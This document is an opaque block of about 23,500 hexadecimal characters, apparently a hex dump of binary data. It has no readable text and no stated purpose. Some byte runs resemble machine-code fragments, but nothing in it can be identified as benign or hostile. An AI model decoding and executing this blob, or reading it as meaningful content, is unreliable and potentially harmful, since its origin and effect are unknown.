daf1e4d0efcf41c0c2971afc60d204cfca29c832928bda352cc3c261d7e3091b0e0636bc7ce0c098c1cb059786b3cd2c0411016526b2e293854de2fa7838212d5ce161ddf2eae08470223b2029019ad2af4cec174ec5239ca4caa3c97315ac6a8e0e4b9b98dae4250f79afebbaa9295b14cfc44f6820c5ca2728c3dc85ea1a6a077fc0c000e0c5c5d60644600c60c3cc6768c809cd6004dfea94b139125b4adad96ef592808182478406191ff1b971391306a59b3d100e08f282340b265d34874cc34d8b58b20f2f60b496dc924727db32f3621d4d1b904b29dacc00ea08dfcb595a908eb6a7f5a0d5f53b1777eb9e0e366961ae70b058e8b05050f3fce92632fd569fa692b64b23ec418007070ebb98fc203aed9697a6ce809e4c04e7eab540e0323fc0f485b820f430e87c2d6ae12dff15142e2b0444c9cac3864ad9bbe732eae411cc314c77b98f124346763712156aa942b060506020cccc50606a62083030c5f3f7e73e7d5dd850c4cddd7004cba982c4cc37eab23596702a015b5b5b3566530b23e469e607435b118d4f453eb5157be978b7cdcecfe1c604c42204bfed7201f1261234d0a2e0b173805166860c2d2c7c1cc11f020f277946f75c3d810d4c1f010103066c2dad45d5472eeec079c9da9ba077f093be6bd7a7869fe870b29603b69099c0e9a8f0cd85a4efcf572554773f911aee1f515d639ce20b22336ff6c246df890dfd82a2a366ee8b435b9b7bfe717b79750685f8671f70773723d02beebd49fdfefd1f145f4b106925c7c84b404c8f98d2e7ce5d4802007b3e56fe68b530ea6acf8a9b74d50fb552f10b68f8c2410183f8631e757847c7793123e3ebc9c1e20007b68b2aabeb9e3df9104fb7c8f8d03179488b8edf6db704d0d105487bf78c48890da0e4c202008b8bda92c5d97044880de51312014cc1c960446048c5987c9df00448488d01a894b00000ffff15665f28048d0ebf3c0101004576fafae8db89cd607418c1d578006408485a0210481c24704481199654572d1c7576f3c0c783600c173e0e0fa8e08f06c1c24280587821353458a7ea4a7b20048585c0b53d00c3c7687c4d144110512a2f046723c9c61d52043a3b4e6f2082981a827d93792d382e2c2895bf7d7d38372f649b20ea2e3a4298af74048f4c2ce931f3884c8f078ec58f7bff2409e11b190248c317b8d4d121753dc94514d006599cc200787140c1fd5034584889f5583c59171ecb87e8cca19ac2508849c1ab63c1cc0d7188389414666689c86960c5806181ff16047aacff29810a7bb828e545cf8b07834f4f49c2c9b1f208c137eab7238c842de74b080e7a1e6a0c9e900e5c9e31ea9c8a0f1c110d5d04550c9d94097c730f14190d34380fb8fc6364c1ce67a4c8c5de73dfac5b0887c765aec06bc8648d5fd78d4773b1900550cfc8632033e19ac343201556bb1202c7c4027e37c3ff74241c70c3488bc3d77c041478c3f7fc404347e400611f9d0fc60a401312407138c5886e917bd68ed948c188f734c3757e2e9eb208638bf61c93528b050d4e55580dc8cd708c27dbe5e0149bd59dc24b573fa978f70e0007873aad1700c0047ca51d010e4b86024606ef6f8b4389ccdc50feea05efd72c044461ccf2b9ac0fc4c78385c0df90c241f7ff15d5e723048b53e51f2082b7427d830bd6314423040433f3455ed49b164245ada3ca2def7b38ef2ec1c18445b47730f303fd86f902057bfdc5c3c4c3d69cca0b72f4cf67afc8827938cf8689024ac38a49b79f28d85c470a7d37c84229a2c10ec74dd89596df8a8a71b2488b5226af00d37bfb6315768af247ffa162530cf46dcad5d24bace747a0e75bbce7357abbfaeff7fd96172ea3f14c2161182fadca7df5c8cd47caebeaaced4da0ed51bced45a8ed632aa2eb49c3caabe7edd8744c8b498ac35a99b75f961e0819dcae4a404382b5a5a0318182817bfa76665ac33bb34bc34029a82a6505c0c2b1d163aba1c7002da3c08b313804a7a34aaae144ce438e4a4ce3a155766c2e63ecef53a0f347a1f65b3ff783e0e643445ab6ebc5654575f97df074e1503c3c6b0e5158488b62a1c34183c273f848c379bac39350c38b02fdaf3028c3c65d306cc7448bcf6b40769e1edd2b270400ef4da4f157a7dbb7a0b71f27d2d92eb1b143e94351abb14b43c9dabdec444e0ed9aa9fe849c30eacac4f4ece7ec0f68294e6f089b0e8d1ecf6f6fa57c1f5603804a234d6fe3b8561ca722999c27bbc422fefce16f7e43d71c25df68b2ada7b4e0248896d9622f45696e6fe781e0e7bedf9bbc5def2f0f04d6786436974f229d102cc7aaed47facd3bbb25045d8c49e58e458beec57cf71e933dfecdaf94bf84738efd1c2d984adc326e5db3bb481df9a08e463eb2024bafa6e2e48b886fd525009af1cfa09a29dea06a3ee7c6a2b177b8bce5a124ac1c93b6b58c5060bf01aadcb4f5b392273724a8f845f9e87151132e1158467153048490129d7ff00c78462a88940878403401010606044ceb64e714b2b634c2c8aab401140706e4e80877350143033c5bec1fa43b9fa753e586050dbf813e9fa1bd877842f6f4343131171403080f830c1b879c1f8c1a9395161f87ead4b738e36391a79e08a4427ff2ed8e144cf139808813a23c0503313f22dea3f08e34d838b425fd942939b833a7b589143cec8f763e2308b3a73b171c9d958c132635880ffea0a7e41234bc10a6320c0710f136e6363f3f231e1e1fa36ea3f29b0b2e95cb55de5b8e6c630a1c9f00a7344b54ac23ac0322dac40093a62baca2061d16d5f536f3e3bf97abc454080c0a8baaa0700336fa3479272a73c9ba73196a72687a15210b305a7de88d65310408f3f7b3b5657216f1b71ede8001058c38989e86bc1bd7af1ea23fd4b8938a3969598820048c899936b768895f4d7369fa82c9d93030f9995e77790e1da0a03ccc63bb93a936c2455101f4c08cf08e2755877b8b22560442158c2cb60392b3349c1e91868fbf85e2de0009aa1b45e538295445323201f57c0f1f0803be1825010ef745ad54409c28340c382f952b92b3404eb4229a5f4cae4ea31787c80b499061a8cf528ca3c567d9699356fcd4cbd0c62f29ba346a6352409486088c14b08b12bf1618bc09bd478bf4317e77208f5ea2b6e54767ad85d8806f240a81ab0d787f5428c2e6081da6aa7c265a7b7a8bea1431aabb5b5c09218337211e87c8201000935c2755c25b7ba50f9e188e74d7b4464a95f26d90861575945718275574d7c6f64f5fdce5b8615c856c185daea868c6e7a69cea371fae50a94c84772e2d6c9c8ccccaf81e9c9fe84bfcbb6b4f28413cffe59f9a799c8c8c8cece212e3936ae6fc1a0a2d4e1fccb9db4edc4e9416fe9889bf5c8c9c9a8bf23fbcf81c51363f5c1b430b2f4c255dbb897f1d4b2f4c266adcbbe3a00a981eb36174b226b49a993ec3842968a6b66a7b611a7ab0ca7a001a1a7c4427756f6ce9b4b18ea917a4d8dc7cec8718001cf36c19ebbc6e822eec7b41895fec74ae695fec7df18c7c7c7c7c73800ffc7d8a1b4cd5ccfbcedc2f4d07c6df9cc081615537ee7c1db44078fa6320e4ac770b4c496fe54f0cc4b023a19db73c270bbc52e259aa7328f1aa72786a12334e8c7cdcd30fccc8466d7f2c7defce9787f9b2e7173c35991cb42c98371be8733f68f32af7666651dcee8adf1a5333d52fd8b32a3e7fd0af7fa08faf225dffdfbfb378cb9d991cb42c9837105ff5000d37bfb76738f89bba71e020048c3d75c241478cb47e47f9cc348c1d5782c5f1fcb83eccc68c3ca4940c3de5bb29808727604727200031b6179033fbcbb2f94bb2bb79c9cafa5951408cb0fc9058b0a7be2948b27ac8b06c9419e16b9318eb8be61e98e0699118e0689018e37bca3301e35fdce062debc4cbb7f28862e363e3c4467fb1c18840cc8de848590600cce893c00502cfc0945cc1161dd0429d8824c2a349808e420573fa81c588f97c8c3f53b29ac1ce4f080889bbfdc5858639043c0000c740aaacb3b2c24043c4854051d6404a4cae31dcc6052bb29dc4c888b1576702424c0d2a2b10d1c585a8a10a91d36a239051c1d01957175949f807de3100454533f3f3e1e1fa36ea31162192a0a6df99e7a345e4502b5f232ce668859bf77990858902171980880ee7f313814069b7efb2c19ce7fb828b0a038289088188160fd04141bfea5d501c04405232650572f2c0044cc34ccfc273b90545408068050311abab334f81e06383ce0e8d075899fd503413d25c880708e8e221aa8953dc88d83ba70065654983ca35b41fab364bcb977d547d01406b4a33ba28c68b024ee66fcbaac1e472512f3c7f6dd1eab4b61ec9c78c048c3bf1bd7ef57399a2f74404286303c308e764854cbd68f4460ca09a9833f38050532aeecfc9af26810ed7d1808cc247e06e2c0a98dbfb95888363a44bcab4501c70c18ee49c1c7a1718747b7837b1a6ca5192c38bf911f4e300000935e3217579b772c90b81443f1822c20a82c40d6a4638bce1c4841331eb0488a602badb49898988f734c3757eb0ebd1ba3ae866ec65c4824e54704833b6e3769fe90d6824acb6eb42f24621378cb935bde325d9f2e3f5ffe9e7e9f5f96678f0f8fdd53941ca53d7b84db2c33b41194b486be1407f144b141589cf0e47b8609fc19d5a1e5039c9b14a82c72ee0c8c1cf1ed1071698174718c107064bc39052c24e47092e600e80c56d20c345ce89d72ab2803633ab6ea7604221933a4d8ec30ab32131901b80e5002fc010f3a62ec11831e24b4839f834d2668379fb74271a71785128378a3275c04b19e9a8f08a8318f6263a97de1b4848c3432088920d007fc8c1ca7b82da8a2a8a4a8b4384c78b41be6f92ca29e48ec073829a6e4da2a3423db9e47b13b75fe69630e2e2ea08771c89ea4a645116c3ce0ed938bfd674b9466952396bc63799684afaab701a33c5c508868648f7bbd45043894afab00b0082a1e301c203fe6fd14b42c3f3330bfab87bdaa1605dffcdd5c71d07454f68f6b03ef9a97f3fb891a7a03f1e9019d0397ee79f66837bf9745469c3c2631218afe9a616be096465285c9f8aa0fa1ba0ea3a6f170cbbdfe0c406773b8ec444773695f46e4f442d694425fcddfe3dd2f0875778c3c4afe5819017029514821998fc037c7571269bb819e7ea1011100400ff3c427a2bd70738387cac10ab8bd4774fcf7bb60f2036f0e6eade7dc3da6930cf86391a668157a67e0a48c3894ac34182b7dd4240026b090868567a4486458beded13928331f30bd4fbd9126f7cb98de8fdbca734d2fce3af11c1884373bb49357d83297d156b1359620dcec1bb9b2ff13b5428d972d4847bf8c080f4ae91490c353e02f4f043b1f2e2e677fb8afeaf613546403d3b445f2d362409bdae497dfddb60c3d2195850cd5eaf5b0a2d017e572878750d0d114152e5e42404467e36eadd05158e98d99d21583450151dc5218864a0a60e40896d2c10dc44c38e4247bbbe05487bf78cc18d813570c807b8aa5b41050496c31f6814d8fcfca9a1d8c73983e5e343388fb5e6842dc4f4fdc8c1cdf4945c30c57df141415b194201909fb8649bc1cccd0809f4b580c1f4c5883000c049f4d9ecc1f55835e1d35f5854700199707e96fc0300f0b8f29594642fb8b2bf7983478ef4ef3a59d7298a57eeb7c78cc2820d98c5d6000666e6838da6b9b4557005202a8a5a3fe9810b48345da5efd1c7de123a83c6f519b81ced7398d2f0670a68444029862ec0d1b8b51da084c63694ea72710a00696a0323ab488bc306bc3e477b33cc2411fb00024cc18998b8655058c2d04b59498bf06351c268be9ecaab8ca6c098d97938c5980f28e2d941386d02158f45cf8b00dade959e54b9f643d127c1fb8f239c208be5762e4435e4d96ffecb2917f9c7e3e8cdc8704894d964932ec0bd100821073ffc2d31001e0f2dfc9169288a5871bd53bce40411272bb8aa7b654cb5e81f9d46d5405b5fa56b5420eadbcc10a2b08bc65defea3176599a91555d196c755b52019c748f771f0f10f1ded7b3e8b3493869f0a7fdb24dbd20d4a82db36512a51feab7b20014cc4588bebf05e89e97f7200e38fbdf4948e488c96dac69eae6cf527ce160e5e65bf13ed691b09f5f7dbd784f0987b9ab8e43429ebababacdd4c66db291d4a158bcb0a513f2c970d8ab5538a6d778646b6b9e607cbcfa4c5296c1b3644096b210d5a050098ab60fcb40a19fba20edf8c3d30392b4687d51448752920344be7af17f4aae2aa86844fed88391324c4ab7c65b8be5024643001e77109b149a0b645411ddd81fe9b362fbdc83a8f4df3efbe1312d3bfe08592b9770a5b0ced6c5854c601400962fccada0488dc8a5a1ccdc50498849ccdd67eadc09c3f2f029a1f485f801f1402d108821c135914e727d0001e108f49449c12ababaeac0f8b08fcb496d186cdc817c5d46ef897d6d99f475e0e0a3903423232324c9f55762b1b48f545f68d9905e00169aa9ff23ca396a6cb8274894f8c92548bca3d6af3c43d065d0db4f888ef3d468dd78b3b84646c62581cab521bd69eb709aca1890c5c0ddd838e3b02223d29328a361f4cddb166579311a6aa9f4796460511d9c71d170f8100916558715710a1f51ba1d872d4b08da31b850a063c68558b5396c7798bab4b48b749a4230790b498fb490ef7d6d1d89bd71ed00160e5922ef298d10d8d500dc0b1b091db1660c7ca2d8c0110a48f259e2f797476521446e9bd0614474417f4aef44ee69d9b0698c845e7ac3b25080e195d0ab54d0105b1da8d5699d5199e8959a19ac0fd461f1384471eaac1d5be4ccac4524cfc6e149c5d885c4fd78f3c86e9656cc1795da95ca854c8bbd33c3de9a43c700e9c7ce2cd27e25b4b55cb8ca06486eaa40be3e83bd812b11bb0e09b9bebfa1a1bf0f4ed63598869a2812ea8f86d22ccfe12e1d08786669cdf8c1ccede34a62e2e0cfcc746bbd835ca7b19bbf5095b84eee79f4a9c1756098a830a09030c82004a6bfb75d1f415e0fadff5dc70d965c89d55c8748c53237184c5bbd1bb9c981c1f5580468c38b01feef9545cf8a5fda000000834834b7c58d4c68448878670800ff48c3c6a5a0cd4cbd3445ed1a0efd010034a49048c588e23cdf04484081ccfdb828f400d8048009f485b0c1f495e80606f0b8c337981c390195943b92ab6fd7bb6ce748c3703050587bff24a54f8a14d860644147c745e4200c51dd43a5e57bfa77fc892222a0e8c5989e74fa052068cb42c96e6697bf6d473138941be49f0000744511dd282a2322b7261080b2b2babe80c1451a2344a1a96f1ebdb30a11eeea77680e0400ff3c427a2bd70760607cb124cf261e1c4cfab02014317df1c96044254533f388c1cd60640878bdb8499de169e98931704889fd501c79ccdc50808170b8fbfa36ea6ffaa3a200935a00c58053934c931e09a2a617161c24c7eaa92e9b89888343c85cbe1270b7b3918115868245b46793ad2d4cc1c1687c19ccdd50018cc759ec2f3bee2dc0479b35a0ed4d396c70243071f08ef98260143885ccf938c747e88a00e707342e99be3a4cbd7c086e0eeb582caf782a747608053d78c3ca49890d088e4668e28ec80405d7a9eaab3cc0c7e9741dca2fe04acbcea6dacdf6f70033c50948c1d57824184d1dc5e148d4b840896dfc91050f8efa4eb8c99c6ff7847c3c0fb8aa1905ffbe438ec1687418589935980c6848e02f19deff00cccc39838583d3d8c5886f687d02dde04b21b25948d990c40acdc7b4bf5be3645385adab805bd88464442df4fd9568f508829250c000b850a4bf0c00f0b8b745b5b44bb8b275caab111a93f4b508bf7e0e8a9380d62dadfab208d2d57af88386d2adb66ef7b81804b60e1e8adb99c8a838652700a364d54b18fe7aed28823ee61b66a8ce6724a1e26626b57cc1ccddb5ae8e169b8dcf65a7c1660a541ce4108d1f0b094505868f6f677e06adfe17fc2ded5e427b37d12b0fb5776b0a6165c5d272e6848d2da562f2986f7b025eb4f96a1f5d24667d1ad159c38e90d7e8ead63721bedf05e0040199d2499b39e0473ed014a39d8ec4d8c90f0691239bf5147a2fb990c7f03f296c2853b0ee21caeb04c38bc48ccb6f8420c1e17808a199240580f188b0d81da080721ed62293a4656768b898c1f9b8808f43c498987e3ee8b5a5984e2e8dd9701c70c34320286cc36f00b911e900612b0358b8a921630cb8a27b76e3fe0581a021047f8b0f4d4d7ec6748b58d090f464123c9b05c61432644cc1c12009406108a03c250e003fb06d8837a349e8ab73bbae15338fa971efad5f20a1e8c9bf5c0ec78943615f23785438c352db4fade61758c28b8349facfb6c243ea52b1c58fc85b5808c3aa25c4c3115ac5b17440e8e3023d1d5594e34fc78946654712501478c3ff54044428c1e56d1bb6888f6a52b22b1c362ab03ae969616b069cf848214250964cbd7a06e0be235505e283606cc38a23c3e342e1b317edd6dee26301f41747acab47fc99967f4d24d7a690f8d48894900f6758916dbc52e2e78c8e320198ce42c399fd644aeb394fcc7308a5a91d50cae2ead959fa34c985404fee99da759772bbcdf95d80634bc10cc470799e5baf274507795d60f3906341385ea16dc82188349e44daa59108969e347c81c934b98782438ac8044cc1346d13c3f82911c0e8898eae3cf8240cac37f24634d6719834b5e8e5067d6cbdce648e06af258a9886a9c38c0b792726c794f6b0fb12cb314008c3060f9290a722edcc7daf9717fb4d01c8848899d79e14db1814161924eb74a3b616bacac6b48f34180849c10d2f70d3a1747352f4014cc1119e26e5eb63c2d04b59c2ab5b6351c268c0a28e8a8b612f89e930727f9098cf22f3ebfa0c94c123658e54b900bed7109b64f3b295b96fe40606c36f2998fbe43d84b14c5d1b82c0e5a20b8c432e10b87cb00b13f458f86f9ed8a9d556cb16fec688d6daafecc32f76f7c1682430bb5437bdc095005cb5438b2bfa9098dce4e120806508acb3d7c34c0badffd6655d05e9d4c211f7012025ec5c6cf1fbf661e501857365256afdcdec9940bacba9b7ed2e75b66a0fe2922661cdf82e5f615030c098d1f4d9b53d6c023e7c37be29dde570dedbbf33b1a153661eee84368ff4d5eb61ba73ba4ccd9d25782e4ea0d76838e7cf63995a8f522000f2dde531370bc76cf67bde26cf25f0c16cac299dbbfcf2284c65466321f6dbd19c605c00710a00090a03d1f253423e3e50f86a20f36150cffe55bf4269db4aa0d9db24867b745fed4e16115496c60bedf643d1dfc28dd291ce62d10ab9b9a7a9b707d425c8c1e1307d7c78c52dedad0851bf151e6599fb24275974a4c81c1e3a51200f468e4d0801f6758c88ba2ff0a0c00048c1cca56b54544ccf8fc2bdfc30cbea594c634331c2e7cbea62176727587029705502f9ea7d89e18dc01d40f8ef617407e5d03440169afa36f41fea5f98d30497f16705e896df83ef0036b3092c48c4a8c96d0e80e9139d9f3359e1d0e5615580b428906925d090b4448882bc4306b7f441b5291f0867cd10aa9943ab2848aa63f3267abd43a7861a607e2ff4a924d4bca830419158f5b520070588462489e84537a1b2068ff4a5bb47ee58f046694d8b9e3fba97587ba3d6757513167044887b7fde3d26ed6b5a04c0265a8c6e453aa36102d16e700e73a2f07e89b735281c037426e23315690fedf788d037d6a5c5911f2ba99d07962e3d663bcf0b8ba19eb6b9b98de0440050342d99d36eed0e2bc287c1a806c8d34bfcaa0687c8e1e0c2431330bf05a4cf9fff7d66caa385c5cbd6fee07387268fc2e3bb04e147a6abaa91b4ac95d937f605ff8f651bf0fd33f110a0e193093993883a7c91ef417f7ee5b0234581b56733fcea0e2b39f9d317fddc14e87c67d062134332c6a2caf4dfb7000133a6a014304843da6b3afb5b50c7d9a6cc0480c5c8cc49e07577da7f4f8dc16804dfeabf57fd0303837b07f09a55e013e8538d30c5f807101f40408444b566aadd75c1cee1ea74a1c93125011d81817599059c562200101fb9b30bded03c3d744329e9aeecb63785b2e2e1ee1df205053c3d759ea2c3e7610e022b7a5da37ce6044f579ba225c470954ce9b20202e013eb5acbc241f7ea554302d098480088d05901de2799701c6faac801feea37f2d1a1a591b581a54dc194b19c31e8bef0a719e68330f5d3cc72c45504f83fea8de2838f5fb8d2e920c1eb1b7a6512de39e37339b232ce770a522d75075815c0f07a5b5232642790aac8f379420b7ef6ba211aca0260b88b8abb77e17c7d2bc5d9c0f379028be25a4b7a1761437fc0aa603960e743ed7e76e2f909c070fa90f8d0f1c3e36648cdc3c3cf7c39da127998a1cfcdcece9d174bc14bde1f8fcb03cda2b7575fde95fd73f269073b629c387bb050320d9cbeac8e04b9deec8fa45420ea83881e06c6ef180234e8210aed081710d1a3ac26b7cb0db66e815777d0a1bee92eefe6f908fa28e708360b5e4d322e0f0e0e27bdbabc591a00f0b8f2b5f0444bb8b2e54ca9050048c1f4b5aee57bf9010f8a1396000048c38b4dc5c0c598e218ea050066eff5580c6d7637cd81481c3c68c38afebf509545cf8a5fda901383cb34b7c5c16874b8f870871800ff62ba90cd0549bd71ed2a2eed007ffe00c8c588b27ccf04b0b441eda814b860c804899d6995e8cc14d806e6a8c39bac980c290168e1ccddbd2635bd8b36bd48c34646485823ff24f51f46d8b814a19022a245d410065b9ec39f37aa77fc8922b2909bc05b9b8b58cb42c91a8d1be49f8f8f007454dd282a2322b726b6a680b2b2ba3ec1451a23445decb96fa3b38a88f7ea1532c8f903ff3c427afbd0d707007cb124cf05230f0d75c39004213fb3c94424741576f388c1cdc4a41c70c5b8799dd1696881893978c1fd501471418ddc5049c1ccfd8b03f936ea5fcaa3a2935208589d8023933c93178a56da0303031c2ccfea9975fa06850a42c85cee52e404ff7b9171e5868245b46793ad2f4ecc22ea09ccdd518c8d4a59ec2f3beeed97bfe42501e8527d4642c3aaaac0b4516dc34337ea118d71f9206d681c79f0b13f7bcf4b88c3583b6ca274d33d7734ea70e78f2161c509484942ca88f8f358cbe7af78aa0280080545c307cd490996138e466864c0c776b0b1cfea6cfba4a3be3e8f88d2d429c4f7e0010033cd050448c1d5783c4d1dc80de148d4b8c96d2da24368c38eba1ea18ebdf745c100400fb8aadc2cad43119f8d84ccc18a749f6f49ceff00cccc39838583d3d8c5882f2881fedde04b2dbe5a4f4dc4ca040bdb67cd9827b8645385ada08001f454a99568f5484a1a50c0b8508c68ef246c9b9aaa1acb7aecd4d360c04b1b542d62b9f82c6dc76bce48a2e169577c82d87170f3c1e801c76cc62d434bc3b2e0720047ec2ded625c55297594864eebe297a9524eb4f46b93ad546a93f162317ae840c38b415158c5d970e4991d606c4b034bcbb2e304d104c682a4c414b6c7f9b8606078587fe75054f32d4439534a4a044b4ffc88c7ea0d3a2f0b4a6568535b88a880846a4b0c17978aaae101723ac372b1cb4b37ff66e5ff3d430248c58d4041748179814947436123807af87e742b51f083c625e55b9c8bc115b826f2d12765ba91c3408358993d90dc58a1e94e22ac2a024c6d12e477c62ec38bf01849ca6902ba956e40048e45267ce6d2aa810b5890cb40c1767b4f286a4a286262b6d6008444c0757137f32bbd65e1d360322334c9cf2a80608e7e5931f09fb883605418335a09a8b65ec902832a5af406c2f939883bf32142a2858404345060022a486020dfeaa247f3adae634b680301579e08975c2d7d5984aea784cb6fd4d9ff1103139b840d2d5f803fa6e5833c7d417583becd45c075704dcb47fcfb4ac914700c64c74aa1e8d6c82e189a9ab232416436fa8952d321786ef503b0b10307a5aa6f84947d695f2e47174b8b9411190e8c9e50d1f494f599882e0b9fbb0433e8da97b6688045f158a480052d68420303c4eea8c02564313f101ea6c7f7c545961d81f28ef16090726662025465e453904040cc31ea11ad44ec521bcb44cf8bd3abfd74bcaf2a7359d8e853e4e76d30787418c3fff0a07c5814541f9c0f2df2227153926d3c907b7bc9fde9ccf5b797a0e4e220db7be2266deec4cbab7ddea3ca5c3fde20dbed05e5973700ceb4ccd28480e8cdf8dd004cec93ba890217bc2b323ca89430a4e43feaa646f603a09454636b3818c12bfccab621021f26035a5bba823252581ab8d86b031737090e0f606222688f06ec2d129263f87b511c2c1a4b145c95c54b22c263b134bbbad6d202055b78445eb52b8002266c97ea8dda438d8f199a5a926ac7e420bdb8cce91d9d450bee3e3f016203adcc45f872cfc5f83e10f2b39bd5e13bfbdd7d0ff23d99f9d73fd414376b2b8296d88d6a6b2586c4044624cecc1f3ea6089f0032a795b04cef038f9fc85598150017909792d2528694b6292da287972fdb6b9fd3b063094c554013334bdb765f5a494b3135cc79cfea8f6b50867519db90c83a609240c300d17bebc64f1b83d34495d18dc69b88a7ea6f2a52b80b9a4b6f0becc56f40c18bcb47e496edc994f7e71ea990b0ae58062e5e7137ce888a5192c3c20f56e08455278b887bff80880987f135c27579b74878aaab4427090232dacc8ff437d73c335305372eeef85ad0b3a3b3d00c002f831341c2f62633058533cf780406e6f3e18f7c151682a5146e5f770bacccb19d1574b8c942141e7be153c1365613fa216b0a198b9e25f9118acdd727ea8b1ec46590a55cb7eadeaa71937873778b7d797df2eaa95ee23cf894035e3a23e6fffac830b9b20643111fc471b2c37a75b996ab313e8861e56367179d80fedaa9f5c332858306a4bdd9cf070d857470400c4fca88be1e73d9cc83829a5c20ebc943880f99fd72d04f76456cdbcbe0ef4ee9dcb8c29ed48fcb7f4544d70cc56f4f008dde70217b353c700041f8984475117053af84797347162d7c431fb644ae737343474fc3c546810f01574060b7cc8ea9702300af6b38721b6a3f3a28cd1f00172c6c6079b5dc31a27b36beb955358859b18d38b52e98b600a1ecc188a04f5ab171c4b55341a8ba78a46db155e0b5f650972327317472be515cb1398cb5a77d6cb6b0b9f91f5eb11da8b553ed04bae40451b101b4b5a2869ebab899ae660cb7cc766eae92ba3cdb9673cb7bb2ea85c72180bc457181ae2b8554dd89d349eb58c07e12853db885e0e81d26c4e6137ef985226fc1c1064b4055554c75806891622ad991b8ddb4d74fc30ba732f6229c8df6298b3377d10137767e4e692868b7da1f1b235254be49f3026c743fdc99e343c1b0d369172a3d9a900e2cb725e01a6dcfd951c1a20db9fc4b4f4ad4d7a3c396de2f067a75e0757de47a7ee8e9946e0500bebe378064d33d52ef324e94b711d99a365c19d19d428b42f620f9cbf353921ddb343288d3fd542a397752d2879169e5a7cab18dcac2bc3981212202b9b880c7ae6354de018dc67ec5ba9c57e22fbcdd0da86089838bc9a28b8c97a0364e5af02e62a1761a6011aae038670066662b4c224160640906c973f1826bcbb3d46451d9427359c694eb38026e6f4074dd3f5fc14be9f4f8a772006a5c575431b4830a08ccef53ff7324d8006aefb530a313b0c435f13030346487d700bd8d30506030d68365306c5c30b080320a38309cc965306b5b304e7e30ccfc30e4f12530ef1ff189b8302bf2d9545486b630192930a454f0e0b5e5b4b206b0dded3047f7b06b3e6530e454b018a8b1ed9c7000a0a10301071b140b05e3e68284949207180017013a32010a01070103011f0f333d03e1f350501382911401edee010f99813f3f1f1e1e1e1818455d03c3d91b0403f8e41d5f5ceeaddc6d2cc4c5d51131fc5c22cfc9a011b1857dc5859cb0b4901b53c35291589d80b50db5810ccc494cac0f678e46c5012ea3febf55c43be903ba6a35fadae522dffd22ea80a860bc4c2dece1cab751911d5becb3872e4c310114fe5fe72e1c64faeabf5fe465f9cdf9f1e829b991803151f8bf075132ebcd606a6e92e6500c3d4f56c9d74867b8f4325370ca3e20c5b6a1c4fa784c6814cf5e1dbc15ee1fe70348c5d954246408c580be70c70400e80239d3004cc1cf064581957bdab00470fc8c2484a20200ffea6dfa6eeda9ec6014788fc7101202000041f8bf0703020048c1cd60046576f348c0c51996501a8f06c15e4e907feabaafb63345b5650d55c3c74c68e5982253f090048c4522eb8c8d23ddf3196b7e40403874c1c6531833fa88ccdd51feea119776e41c91a894b4040000487bff24f3c7dd212048c94504c00e5598c3cc0084c1d57804751516011fc96d3cd0642c68ab8e47d1960528ec8c58990da0e4c213e3bac3c9bbf8d0b121ca63e8d4de00c6ccd4c111d0b428c598018d2ab0d764b0c03feab67251c675e893487828d1ac2d838f98b0a58d0d6b527d76fac40c0b3ab0d1517951173e0e010e046a6f42420c5dafea8c1963e0038545b54ebaf3725014c9c6488ae5483e32a8b356e5b3331c54c1fd144404dfea6efb929092ae3c8381bbbe45cf4b9a5eff7e001cc6ae5017f288c3adaa8f5c5f7951f3db79f217d46c2c0b0381004545f22cdfde039e8fc1c25798a7a70b5de5fa36ea79ec1c9c33fa219d087f02cccf0a0981c8415f1fcb6fcc2048c35291cb42f1d8ead85ab77fc38043cd4ce95472f9ea31a49b57c78b435b50c3d8439bc05b18f7eaee3ae4ac8a4b4083c073b9891fff960a700602c0b2fbca7bb1cac3b0b9ca3bf10a3bb82c096257f2e30d87d75c74f747987c7fdfe4abd09ebd2c1223aa0bbdb24ec40533c5f623bb5f8649c8b0708bfa6152074571692be15fc34afbfb116c3d64a545b44a76488dc67bb9f25be784472024000b38e115846b2900038bb879c1f87981a95139c138398823cb6e87c3f640501c70c3488b49c6e59bbc454080688171a7400039e2ec8bce880a0fb9bd048b5192c1880849c860da7374b8c277c7ff154db0eb03f635c2116479b7d2a9c58f44278a64064d05c34c4f9e13115461a3b7b6fa4930c0d0657d1f174a0803011a62b99b2acfea1700425390fc4f307562653a0a55fd0de6b5748b8dcc812bef2fa78077b09a1a411d4c1de5901da5bbbc80276b4946c6ceba74ce0b4fc344e7d7af584a6399f87c3c48ddda1314489b83dae617deef22a40f56dd261f206f4037606138a8d8c3cc4f8358d34cc78fd498c5b9e4d049ca7bf7796758c28b083be19ac382f6ea112acc22e6afa7d13cf89bbf6da79dc38928654c0d2f605207fc9903b3ba14678809a6a6e627c1262eae97f0c3e70ce3a634706f06494c0ee0dedddcb771b2c3c2412b637e3e4e5afcd8320a7b7b8809babafa3bc13ab20938b57a8b58ac81819b53894565e260618bb2d31e16ae4e44cf8830e19b8821e1c1919980c1ca4be0e5137789ef0d3ebe91e2ee4378341a5cb3b8d6eb1f364140732bc1de8b406489614bd1da40c1f55c756eea99c38bc189474d808a73cb70f6734dc37515e18a840703254562f8b273486367771c5473c28b655fc3d8732f0e078ffad18218190f701e8386c14dbd792c41eb0b573fe7757802eb6b832be727ad45165e487f3d0acda53a27396046cad64f3057c95f88e8dddd8acab838390991b99cad94dc509a0a8decfa5f478bf25b246b0e6323276c654d504e7c7d3d7f415ec30f84cb6ae1e19e75cce87a10c7578f1217dec0c96daf703631ba2a05a144605439c0e2634d4d3bc5bf496a22c361a74d89f293a9ca559ffebe206804c4fabb89ca5cd6a138f020c346aba1834424486c0140ca7501779d0ec47e38968b4c29c622a502c202c2e4607418c55d9c684c2cc419d188b796e1a0e0014eb961d60039b9819aaab18128a981801d5b185d8b0a81028983c7684428c1ab96160855eade8b438efd6000efeac7d20d49cf4dce49ccdbf689e137eaa7a3f1e149c353f80a5e3302c50dcb44895d9ec34bc260f1d14b7d40788dc988850784c780503185ee34ea92e46062c1026b85c74823f97979e6fb1154e3a0434e4abab7428128ad4629664bc73798c66262f3bd888441e1e0b353a2840582a42525b998c5eb7f6b1e48cd5eaf60ebea211b8fb1716aeb85e49016a6a148c2074a2d4be3a36dc1685451f2f7a55415b6f745c52e6e1f5966b2b2e56a8f187140c588a1dac8f68e4788c0928a78e400450cdf33ee42c74cc308a9f4f1a141b630a7f1c03276dfb7946a43ca48311bf5999475e440485b061480be4f78c1d848382cb90e982f8fb47c2224e0277279b574aaba11ab5bb0adbd59c0ce5730a50888fedb95b10449c0c9cc891c1fdcfa03535c02e8c3eb39cf1d0501115494d020adc558749bea083d238078986b078b1fc95b0ce834dc0500ff3c40789f18a7eb3fb93698e987c633d319498bc44749f08e7ef9f941010188cc607530565762c496735d9662b1c400fef1f11193493500eac8fdc1e203b92f